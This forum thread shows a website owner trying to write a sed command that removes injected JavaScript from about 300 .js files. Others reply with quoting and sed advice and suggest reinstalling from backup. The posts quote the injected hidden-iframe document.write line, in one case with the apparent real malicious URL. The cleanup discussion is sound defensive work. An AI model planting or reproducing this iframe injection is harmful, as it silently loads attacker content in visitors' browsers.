[SOLVED] The sed challenge - trying to clean up code injection

[donhare]

Hi all,

this is what I'm trying for two days now.

The code below was injected into about 300 .js-files on my website. I got a list of infected files, I got a linux box, but Im lacking the skill. All the internet couldn't be of any help so far.

Code:

;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="a-url-that-i can-not-post"></iframe>');

My script reads the file names form a list and applies the sed-command. So the main challenge as I see it is to escape the single and double quotes. I failed so far to make a sed statement work.

Please help, I'm really desperate and reall don't want to do it all manually. Thank you all in advance!

[JohnGraham]

This thread looks like it has the right idea.

[donhare]

Thank you for your answer. Been there already and couldn't get my head around it. Yet, I'll give it another try. Nevertheless, any help help is appreciated.

[Irithori]

The problem with a compromised host is, that you dont know for sure what else has been modified.
So I would suggest a reinstall of the machine and a new deploy of this website from a trusted source: ie backup or revision control.

[watael]

hi,

as you can't efficiently escape single quote , go with double quotes, and escape them in the pattern

Code:

sed "s/some\"expressions\" have 'got' double quotes/substitution/" file1 file2 file_n

[donhare]

Basically you're right and i share your opinion. The website is hosted by a provider and i have only confixx access, so all i could do is a complete Joomla install. Still trying to avoid this...

[donhare]

Ok, this is what I've tried (for the 103rd time, I guess...)

Code:

sed "d/;document\.write\('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:some url"><\/iframe>'\);/g"

Error message in terminal:
sed: -e Ausdruck #1, Zeichen 2: Zusätzliche Zeichen nach dem Befehl

which translates into:
sed: -e expression #1, Character 2: Additional Characters trailing the command

Any ideas welcome!

[watael]

d goes at the end,
g is useless,
parenthesis should not be escaped.

[donhare]

This is the edited codeline, according to your suggestion:

Code:

sed "/;document\.write('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:\/\/hsuvmht\.freewww\.info\/55965feab821e9e8815792a6d42f565c\.cgi\?8\"><\/iframe>');/d"

It runs without error, and also without the desired result. The pattern seems not to match. Still too many escapes?

[drl]

Hi.

The shell interprets many special characters. So when sed/awk/perl program-commands are coded on the command line, misery with quoting often ensues.

If I were doing this, I would place the commands in a separate file and have sed/awk/perl read the file of commands without the shell intervention. For sed, see the man page and read about option -f, then experiment.

Best wishes ... cheers, drl